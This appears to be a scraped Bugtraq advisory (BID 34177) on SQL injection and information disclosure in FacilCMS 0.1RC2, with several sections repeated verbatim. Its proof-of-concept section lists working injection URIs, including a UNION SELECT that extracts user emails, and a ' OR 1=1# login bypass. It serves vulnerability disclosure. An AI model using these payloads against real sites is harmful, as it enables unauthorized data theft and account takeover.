FacilCMS Multiple SQL Injection And Information Disclosure Vulnerabilities
BID:34177
Info
FacilCMS Multiple SQL Injection And Information Disclosure Vulnerabilities
| Bugtraq ID: | 34177 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 18 2009 12:00AM |
| Updated: | Mar 19 2009 05:36PM |
| Credit: | any.zicky |
| Vulnerable: |
FacilCMS FacilCMS 0.1RC2 |
| Not Vulnerable: | |
Discussion
FacilCMS Multiple SQL Injection And Information Disclosure Vulnerabilities
FacilCMS is prone to multiple SQL-injection and information-disclosure vulnerabilities.
Exploiting these issues could allow an attacker to obtain sensitive information, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
FacilCMS 0.1RC2 is vulnerable; other versions may also be affected.
FacilCMS is prone to multiple SQL-injection and information-disclosure vulnerabilities.
Exploiting these issues could allow an attacker to obtain sensitive information, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
FacilCMS 0.1RC2 is vulnerable; other versions may also be affected.
Exploit / POC
FacilCMS Multiple SQL Injection And Information Disclosure Vulnerabilities
Attackers can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/phpinfo.php
http://www.example.com/facil-cms/modules.php?modload=News&op=view&id=1+AND+1=1#
http://www.example.com/facil-cms/modules.php?modload=Pages&op=view&id=1+ORDER+BY+5/*
http://www.example.com/facil-cms/modules.php?modload=Albums&op=photo&id=-1+UNION+SELECT+1,2,3,email+FROM+facil_users+LIMIT+1,2/*
The following input examples are available:
http://www.example.com/index.php?modload=User
Email: [email protected]'#
pass: blaaaaa
Email: ' OR 1=1#
pass: blaaaaa
Attackers can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/phpinfo.php
http://www.example.com/facil-cms/modules.php?modload=News&op=view&id=1+AND+1=1#
http://www.example.com/facil-cms/modules.php?modload=Pages&op=view&id=1+ORDER+BY+5/*
http://www.example.com/facil-cms/modules.php?modload=Albums&op=photo&id=-1+UNION+SELECT+1,2,3,email+FROM+facil_users+LIMIT+1,2/*
The following input examples are available:
http://www.example.com/index.php?modload=User
Email: [email protected]'#
pass: blaaaaa
Email: ' OR 1=1#
pass: blaaaaa
Solution / Fix
FacilCMS Multiple SQL Injection And Information Disclosure Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
FacilCMS Multiple SQL Injection And Information Disclosure Vulnerabilities
References:
References:
- FacilCMS Product Page (FacilCMS)